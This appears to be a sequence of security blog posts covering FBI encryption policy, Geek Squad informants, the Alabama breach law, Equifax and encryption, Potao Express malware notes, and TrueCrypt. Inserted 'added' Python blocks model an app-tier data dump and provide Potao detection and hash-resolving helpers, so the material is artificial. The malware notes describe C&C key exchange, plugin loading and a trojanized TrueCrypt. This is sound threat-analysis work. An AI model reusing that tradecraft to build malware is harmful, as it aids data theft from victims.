There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.

In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Wray, that meant the FBI could not access more than half of the devices they tried to access during the period.

“Let me be clear: the FBI supports information security measures, including strong encryption,” Wray said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”

However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.

In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.

Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.

“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”

With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to lawmakers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.
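To make the tier argument concrete, here is an added model (not Equifax's code or any vendor's): rows are encrypted at rest, a stolen disk yields only ciphertext, yet anything running inside the application tier reads plaintext through the app's own query path, and only a separate layered control (a per-session read volume check, assumed here as one example of "identify anomalous behavior") limits the damage. The cipher is an HMAC-SHA256 counter-mode keystream standing in for AES; the records and key are constructed demo values.

```python
import hmac, hashlib, os

# Added illustration of the argument above (not Equifax's code or any vendor's).
# Stand-in for transparent at-rest encryption: HMAC-SHA256 in counter mode as a
# keystream (a demo construction standing in for AES; not for production use).
def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    blocks = (hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
              for i in range((length + 31) // 32))
    return b"".join(blocks)[:length]

def encrypt_at_rest(key: bytes, plaintext: bytes) -> bytes:
    nonce = os.urandom(16)
    return nonce + bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))

def decrypt_at_rest(key: bytes, blob: bytes) -> bytes:
    nonce, body = blob[:16], blob[16:]
    return bytes(c ^ k for c, k in zip(body, _keystream(key, nonce, len(body))))

class DataTier:
    """Rows are ciphertext on disk: a stolen disk or data file yields nothing readable."""
    def __init__(self, key: bytes):
        self.key, self.rows = key, []
    def store(self, record: bytes) -> None:
        self.rows.append(encrypt_at_rest(self.key, record))

class AppTier:
    """Authenticated to the data tier, so every read it makes comes back decrypted.
    per_session_limit is the extra, layered control: a read-volume anomaly check."""
    def __init__(self, db: DataTier, per_session_limit=None):
        self.db, self.limit, self.reads = db, per_session_limit, 0
    def lookup(self, row_id: int) -> bytes:
        if self.limit is not None and self.reads >= self.limit:
            raise PermissionError("bulk read blocked by anomaly control")
        self.reads += 1
        return decrypt_at_rest(self.db.key, self.db.rows[row_id])

def dump_via_compromised_app(app: AppTier) -> list:
    """Code running inside the app tier (as via the Struts flaw) just calls the
    app's own read path; the at-rest encryption is transparent to it."""
    out = []
    for i in range(len(app.db.rows)):
        try:
            out.append(app.lookup(i))
        except PermissionError:
            break
    return out

# Constructed demo data (fake identifiers, not real records) and a fixed demo key.
DEMO_KEY = bytes(range(32))
SAMPLE_RECORDS = [b"name=A;ssn=000-00-0001", b"name=B;ssn=000-00-0002", b"name=C;ssn=000-00-0003"]
def build_demo_db() -> DataTier:
    db = DataTier(DEMO_KEY)
    for rec in SAMPLE_RECORDS:
        db.store(rec)
    return db
```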

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

Potao Express samples


2011 - July 2015
  • Aka Sapotao and node69
  • Group - Sandworm / Quedagh APT
  • Vectors - USB, exe as doc, xls
  • Victims - RU, BY, AM, GE
  • Victims - MMM group, UA gov
  • Modified versions of the encryption software (Win32/FakeTC) that included a backdoor have been served to selected targets.
  • Win32/FakeTC - data theft from encrypted drives
  • The Potao main DLL only takes care of its core functionality; the actual spying functions are implemented in the form of downloadable modules. The plugins are downloaded each time the malware starts, since they aren’t stored on the hard drive.
  • 1st - Full plugins, whose export function is called Plug. Full plugins run continuously until the infected system is restarted.
  • 2nd - Light plugins, with an export function called Scan. Light plugins terminate immediately after returning a buffer with the information they harvested off the victim’s machine.
  • Some of the plugins were signed with a certificate issued to “Grandtorg”.
  • Traffic
  • Strong encryption. The data sent is encapsulated using the XML-RPC protocol.
  • MethodName value 10a7d030-1a61-11e3-beea-001c42e2a08b is always present in Potao traffic.
  • After receiving the request, the C&C server generates an RSA-2048 public key and signs this generated key with another, static RSA-2048 private key.
  • In the 2nd stage the malware generates a symmetric AES-256 key. This AES session key is encrypted with the newly received RSA-2048 public key and sent to the C&C server.
  • The actual data exchange after the key exchange is then encrypted using symmetric cryptography, which is faster, with the AES-256 key.
  • The Potao malware sends an encrypted request to the server with computer ID, campaign ID, OS version, version of malware, computer name, current privileges, OS architecture (64 or 32 bits) and also the name of the current process.
  • Potao USB - uses social engineering, exe in the root disguised as drive icon
  • Potao Anti RE - uses the MurmurHash2 algorithm for computing the hashes of the API function names.
  • Potao Anti RE - encryption of strings
  • Russian TrueCrypt Win32/FakeTC - The malicious program code within the otherwise functional TrueCrypt software runs in its own thread. This thread, created at the end of the Mount function, enumerates files on the mounted encrypted drive, and if certain conditions are met, it connects to the C&C server, ready to execute commands from the attackers.
  • IOC
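Because the session content is AES-encrypted after the key exchange, the stable network artefact in the traffic notes above is the XML-RPC methodName. The following is an added detection helper, not code from the original analysis, that parses request bodies as XML-RPC and flags that value; the sample bodies are constructed, not captured traffic.

```python
import xml.etree.ElementTree as ET

# Added detection helper, not code from the original Potao analysis: flag XML-RPC
# request bodies whose methodName is the constant value reported for Potao traffic.
POTAO_METHOD_NAME = "10a7d030-1a61-11e3-beea-001c42e2a08b"

def xmlrpc_method_name(body: bytes):
    """Return the methodName of an XML-RPC methodCall body, or None if it is not one."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None                      # not XML at all
    if root.tag.lower() != "methodcall":
        return None                      # XML, but not an XML-RPC call
    for child in root:
        if child.tag.lower() == "methodname" and child.text:
            return child.text.strip()
    return None

def is_potao_beacon(body: bytes) -> bool:
    """Match only the request form the notes describe; the payload stays opaque."""
    return xmlrpc_method_name(body) == POTAO_METHOD_NAME

# Constructed sample bodies (not captured traffic); the <base64> blob is a placeholder.
SAMPLE_BODIES = {
    "benign_rpc": b"<?xml version='1.0'?><methodCall><methodName>system.listMethods"
                  b"</methodName><params/></methodCall>",
    "potao_like": b"<?xml version='1.0'?><methodCall><methodName>"
                  + POTAO_METHOD_NAME.encode() +
                  b"</methodName><params><param><value><base64>QUJDRA==</base64>"
                  b"</value></param></params></methodCall>",
    "plain_xml": b"<root><methodName>" + POTAO_METHOD_NAME.encode() + b"</methodName></root>",
    "not_xml": b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
}

def scan_bodies(bodies: dict) -> list:
    """Names of the sample bodies that look like Potao beacons."""
    return [name for name, body in bodies.items() if is_potao_beacon(body)]
```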
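For the API-name hashing noted under Anti RE, an analyst resolves the hashes found in a sample by hashing candidate export names with the same algorithm. The following is an added helper, not code from the Potao write-up: a 32-bit MurmurHash2 implementation plus a resolver table; the seed Potao uses is not stated above, so it is a parameter here, and the candidate API list is a constructed sample.

```python
# Added analyst helper, not code from the Potao write-up: a 32-bit MurmurHash2
# implementation (the algorithm the notes say Potao uses for API-name hashes) and a
# lookup table that resolves such hashes back to names. The seed Potao uses is not
# given above, so it is a parameter here; 0 is only a placeholder for the demo.
M, R, MASK = 0x5BD1E995, 24, 0xFFFFFFFF

def murmurhash2(data: bytes, seed: int) -> int:
    """MurmurHash2 (Austin Appleby's 32-bit variant), little-endian 4-byte blocks."""
    h = (seed ^ len(data)) & MASK
    i = 0
    while len(data) - i >= 4:
        k = int.from_bytes(data[i:i + 4], "little")
        k = (k * M) & MASK
        k ^= k >> R
        k = (k * M) & MASK
        h = ((h * M) & MASK) ^ k
        i += 4
    tail = data[i:]
    if tail:                               # 1-3 trailing bytes, then one more multiply
        h ^= int.from_bytes(tail, "little")
        h = (h * M) & MASK
    h ^= h >> 13
    h = (h * M) & MASK
    h ^= h >> 15
    return h

# Constructed candidate list; in practice load the export names of kernel32, advapi32,
# wininet etc. so that every hash found in the sample can be tried against them.
CANDIDATE_APIS = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "CreateThread",
                  "WriteFile", "InternetOpenA", "CryptAcquireContextA"]

def build_resolver(names, seed: int) -> dict:
    """Map hash -> API name; ASCII names, since GetProcAddress takes ANSI names."""
    return {murmurhash2(name.encode("ascii"), seed): name for name in names}

def resolve_api_hash(value: int, table: dict):
    """Name for a hash pulled out of the sample, or None if no candidate matches."""
    return table.get(value & MASK)
```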


What’s with the TrueCrypt warning?

TrueCrypt, the free open source full disk encryption program favoured by many security-savvy people, including apparently Edward Snowden, is no more. Its website now redirects to its SourceForge page which starts with this message: WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues This page exists only to help migrate existing data […]